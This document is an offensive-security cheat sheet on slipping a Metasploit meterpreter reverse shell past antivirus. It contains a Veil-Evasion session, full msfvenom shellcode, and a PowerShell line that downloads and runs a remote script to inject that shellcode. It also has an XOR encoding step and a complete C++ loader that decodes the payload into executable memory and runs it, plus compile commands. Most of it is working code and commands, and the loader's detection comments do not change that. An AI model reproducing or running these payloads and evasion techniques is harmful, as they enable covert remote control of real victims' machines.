# Evading the AV to execute meterpreter



Veil

# veil-evasion

[menu>>]: list
[*] Available Payloads:

...
5) c/meterpreter/rev_tcp
...

[menu>>]: 5

Payload: c/meterpreter/rev_tcp loaded

[c/meterpreter/rev_tcp>>]: set lhost 192.168.0.1
[i] LHOST => 192.168.0.1
LPORT 4444
COMPILE_TO_EXE Y

[c/meterpreter/rev_tcp>>]: generate
[>] Please enter the base name for output files: meterpreter-veil

[*] Executable written to: /var/lib/veil-evasion/output/compiled/meterpreter-veil.exe

Language: c
Payload: c/meterpreter/rev_tcp
Required Options: COMPILE_TO_EXE=Y LHOST=192.168.0.1 LPORT=4444
Payload File: /var/lib/veil-evasion/output/source/meterpreter-veil.c
Handler File: /var/lib/veil-evasion/output/handlers/meterpreter-veil_handler.rc

[menu>>]: exit

# msfconsole --resource /var/lib/veil-evasion/output/handlers/meterpreter-veil_handler.rc


PowerSploit

# msfvenom --arch x86_64 --platform windows --payload windows/x64/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 --format c 2>&1 | sed -e '1,3d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,
0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

# msfconsole --resource meterpreter-powersploit_handler.rc

ps> iex (new-object net.webclient).downloadstring('http://192.168.0.1:8000/CodeExecution/Invoke-Shellcode.ps1')

ps> invoke-shellcode -shellcode 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x1
0,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 -force


XOR routine and virtual allocation

# ipython

In [1]: meterpreter = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x
00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5]

In [2]: xored = ''

In [3]: for byte in meterpreter:
    xored += '\\' + hex(byte ^ ord('x'))[1:]
   ...:

In [4]: print xored
\x84\x30\xfb\x9c\x88\x90\xb4\x78\x78\x78\x39\x29\x39\x28\x2a\x29\x2e\x30\x49\xaa\x1d\x30\xf3\x2a\x18\x30\xf3\x2a\x60\x30\xf3\x2a\x58\x30\xf3\xa\x28\x30\x77\xcf\x32\x32\x35\x49\xb1\x30\x49\xb8\xd4\x44\x19\x4\x7a\x54\x58\x39\xb9\xb1\x75\x39\x79\xb9\x9a\x95\x2a\x39\x29\x30\xf3\x2a\x58\xf3\x3a\x44\x30\x79\xa8\x1e\xf9\x0\x60\x73\x7a\x77\xfd\xa\x78\x78\x78\xf3\xf8\xf0\x78\x78\x78\x30\xfd\xb8\xc\x1f\x30\x79\xa8\x28\xf3\x30\x60\x3c\xf3\x38\x58\x31\x79\xa8\x9b\x2e\x30\x87\xb1\x39\xf3\x4c\xf0\x30\x79\xae\x35\x49\xb1\x30\x49\xb8\xd4\x39\xb9\xb1\x75\x39\x79\xb9\x40\x98\xd\x89\x34\x7b\x34\x5c\x70\x3d\x41\xa9\xd\xa0\x20\x3c\xf3\x38\x5c\x31\x79\xa8\x1e\x39\xf3\x74\x30\x3c\xf3\x38\x64\x31\x79\xa8\x39\xf3\x7c\xf0\x30\x79\xa8\x39\x20\x39\x20\x26\x21\x22\x39\x20\x39\x21\x39\x22\x30\xfb\x94\x58\x39\x2a\x87\x98\x20\x39\x21\x22\x30\xf3\x6a\x91\x33\x87\x87\x87\x25\x31\xc6\xf\xb\x4a\x27\x4b\x4a\x78\x78\x39\x2e\x31\xf1\x9e\x30\xf9\x94\xd8\x79\x78\x78\x31\xf1\x9d\x31\xc4\x7a\x78\x69\x24\xb8\xd0\x78\x79\x39\x2c\x31\xf1\x9c\x34\xf1\x89\x39\xc2\x34\xf\x5e\x7f\x87\xad\x34\xf1\x92\x10\x79\x79\x78\x78\x21\x39\xc2\x51\xf8\x13\x78\x87\xad\x12\x7d\x39\x26\x28\x28\x35\x49\xb1\x35\x49\xb8\x30\x87\xb8\x30\xf1\xba\x30\x87\xb8\x30\xf1\xb9\x39\xc2\x92\x77\xa7\x98\x87\xad\x30\xf1\xbf\x12\x68\x39\x20\x34\xf1\x9a\x30\xf1\x81\x39\xc2\xe1\xdd\xc\x19\x87\xad\xfd\xb8\xc\x72\x31\x87\xb6\xd\x9d\x90\xeb\x78\x78\x78\x30\xfb\x94\x68\x30\xf1\x9a\x35\x49\xb1\x12\x7c\x39\x20\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x6\x2d\x30\xfb\xbc\x58\x26\xf1\x8e\x12\x38\x39\x21\x10\x78\x68\x78\x78\x39\x20\x30\xf1\x8a\x30\x49\xb1\x39\xc2\x20\xdc\x2b\x9d\x87\xad\x30\xf1\xbb\x31\xf1\xbf\x35\x49\xb1\x31\xf1\x88\x30\xf1\xa2\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x5\x50\x20\x39\x2f\x21\x10\x78\x38\x78\x78\x39\x20\x12\x78\x22\x39\xc2\x73\x57\x77\x48\x87\xad\x2f\x21\x39\xc2\xd\x16\x35\x19\x87\xad\x31\x87\xb6\x91\x44\x87\x87\x87\x30\x79\xbb\x30\x51\xbe\x30\xfd\x8e\xd\xcc\x39\x87\x9f\x20\x12\x78\x21\x31\xbf\xba\
x88\xcd\xda\x2e\x87\xad

# cat meterpreter.cpp
#include <windows.h>
#include <iostream>

// Loader stub: decodes an embedded byte buffer with a single-byte XOR, copies it into a
// freshly allocated executable region and calls it as a function.
// Reviewer note (detection): the XOR only changes the byte pattern stored in the file.
// After the loop the decoded bytes sit in process memory in the clear, and the
// allocate-RWX / copy / indirect-call sequence below is observable at run time.
int main(int argc, char **argv) {
        // Buffer as printed by the ipython session on this page: every byte of the
        // msfvenom output XORed with ord('x') (0x78).
        char b[] = "\x84\x30\xfb\x9c\x88\x90\xb4\x78\x78\x78\x39\x29\x39\x28\x2a\x29\x2e\x30\x49\xaa\x1d\x30\xf3\x2a\x18\x30\xf3\x2a\x60\x30\xf3\x2a\x58\x30\xf3\xa\x28\x30\x77\xcf\x32\x32\x35\x49\xb1\x30\x49\xb8\xd4\x44\x19\x4\x7a\x54\x58\x39\xb9\xb1\x75\x39\x79\xb9\x9a\x95\x2a\x39\x29\x30\xf3\x2a\x58\xf3\x3a\x44\x30\x79\xa8\x1e\xf9\x0\x60\x73\x7a\x77\xfd\xa\x78\x78\x78\xf3\xf8\xf0\x78\x78\x78\x30\xfd\xb8\xc\x1f\x30\x79\xa8\x28\xf3\x30\x60\x3c\xf3\x38\x58\x31\x79\xa8\x9b\x2e\x30\x87\xb1\x39\xf3\x4c\xf0\x30\x79\xae\x35\x49\xb1\x30\x49\xb8\xd4\x39\xb9\xb1\x75\x39\x79\xb9\x40\x98\xd\x89\x34\x7b\x34\x5c\x70\x3d\x41\xa9\xd\xa0\x20\x3c\xf3\x38\x5c\x31\x79\xa8\x1e\x39\xf3\x74\x30\x3c\xf3\x38\x64\x31\x79\xa8\x39\xf3\x7c\xf0\x30\x79\xa8\x39\x20\x39\x20\x26\x21\x22\x39\x20\x39\x21\x39\x22\x30\xfb\x94\x58\x39\x2a\x87\x98\x20\x39\x21\x22\x30\xf3\x6a\x91\x33\x87\x87\x87\x25\x31\xc6\xf\xb\x4a\x27\x4b\x4a\x78\x78\x39\x2e\x31\xf1\x9e\x30\xf9\x94\xd8\x79\x78\x78\x31\xf1\x9d\x31\xc4\x7a\x78\x69\x24\xb8\xd0\x78\x79\x39\x2c\x31\xf1\x9c\x34\xf1\x89\x39\xc2\x34\xf\x5e\x7f\x87\xad\x34\xf1\x92\x10\x79\x79\x78\x78\x21\x39\xc2\x51\xf8\x13\x78\x87\xad\x12\x7d\x39\x26\x28\x28\x35\x49\xb1\x35\x49\xb8\x30\x87\xb8\x30\xf1\xba\x30\x87\xb8\x30\xf1\xb9\x39\xc2\x92\x77\xa7\x98\x87\xad\x30\xf1\xbf\x12\x68\x39\x20\x34\xf1\x9a\x30\xf1\x81\x39\xc2\xe1\xdd\xc\x19\x87\xad\xfd\xb8\xc\x72\x31\x87\xb6\xd\x9d\x90\xeb\x78\x78\x78\x30\xfb\x94\x68\x30\xf1\x9a\x35\x49\xb1\x12\x7c\x39\x20\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x6\x2d\x30\xfb\xbc\x58\x26\xf1\x8e\x12\x38\x39\x21\x10\x78\x68\x78\x78\x39\x20\x30\xf1\x8a\x30\x49\xb1\x39\xc2\x20\xdc\x2b\x9d\x87\xad\x30\xf1\xbb\x31\xf1\xbf\x35\x49\xb1\x31\xf1\x88\x30\xf1\xa2\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x5\x50\x20\x39\x2f\x21\x10\x78\x38\x78\x78\x39\x20\x12\x78\x22\x39\xc2\x73\x57\x77\x48\x87\xad\x2f\x21\x39\xc2\xd\x16\x35\x19\x87\xad\x31\x87\xb6\x91\x44\x87\x87\x87\x30\x79\xbb\x30\x51\xbe\x30\xfd\x8e\xd\xcc\x39\x87\x9f\x20\x12\
x78\x21\x31\xbf\xba\x88\xcd\xda\x2e\x87\xad";
        // Scratch buffer of the same size; sizeof b counts the string literal's terminating NUL.
        char c[sizeof b];
        // Undo the XOR with the same key byte ('x'); the plain bytes exist in c from here on.
        for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
        // Commit a region that is readable, writable and executable at once.
        // The return value is not checked before it is used below.
        void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        // Copy the decoded bytes into the executable region.
        memcpy(exec, c, sizeof c);
        // Treat the region as a void() function and call it; control leaves this program's own code here.
        ((void(*)())exec)();
}
# # 32bits - i686-w64-mingw32-g++ -static-libstdc++ -static-libgcc -o meterpreter.exe meterpreter.cpp
# x86_64-w64-mingw32-g++ -static-libstdc++ -static-libgcc -o meterpreter.exe meterpreter.cpp
